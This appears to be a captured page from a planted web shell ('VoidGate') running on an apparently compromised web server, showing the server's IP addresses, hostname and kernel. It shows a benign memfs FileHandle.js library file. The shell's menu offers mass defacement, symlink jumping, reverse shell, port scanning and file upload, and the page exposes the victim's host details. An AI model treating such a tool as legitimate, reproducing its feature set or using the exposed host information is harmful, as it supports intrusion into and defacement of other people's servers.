ヤミRoot VoidGate
User / IP
:
216.73.216.81
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
node_modules
/
memfs
/
lib
/
node
/
Viewing: FileHandle.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.FileHandle = void 0; const util_1 = require("./util"); class FileHandle { constructor(fs, fd) { this.fs = fs; this.fd = fd; } appendFile(data, options) { return (0, util_1.promisify)(this.fs, 'appendFile')(this.fd, data, options); } chmod(mode) { return (0, util_1.promisify)(this.fs, 'fchmod')(this.fd, mode); } chown(uid, gid) { return (0, util_1.promisify)(this.fs, 'fchown')(this.fd, uid, gid); } close() { return (0, util_1.promisify)(this.fs, 'close')(this.fd); } datasync() { return (0, util_1.promisify)(this.fs, 'fdatasync')(this.fd); } read(buffer, offset, length, position) { return (0, util_1.promisify)(this.fs, 'read', bytesRead => ({ bytesRead, buffer }))(this.fd, buffer, offset, length, position); } readFile(options) { return (0, util_1.promisify)(this.fs, 'readFile')(this.fd, options); } stat(options) { return (0, util_1.promisify)(this.fs, 'fstat')(this.fd, options); } sync() { return (0, util_1.promisify)(this.fs, 'fsync')(this.fd); } truncate(len) { return (0, util_1.promisify)(this.fs, 'ftruncate')(this.fd, len); } utimes(atime, mtime) { return (0, util_1.promisify)(this.fs, 'futimes')(this.fd, atime, mtime); } write(buffer, offset, length, position) { return (0, util_1.promisify)(this.fs, 'write', bytesWritten => ({ bytesWritten, buffer }))(this.fd, buffer, offset, length, position); } writeFile(data, options) { return (0, util_1.promisify)(this.fs, 'writeFile')(this.fd, data, options); } } exports.FileHandle = FileHandle;
Coded With 💗 by
0x6ick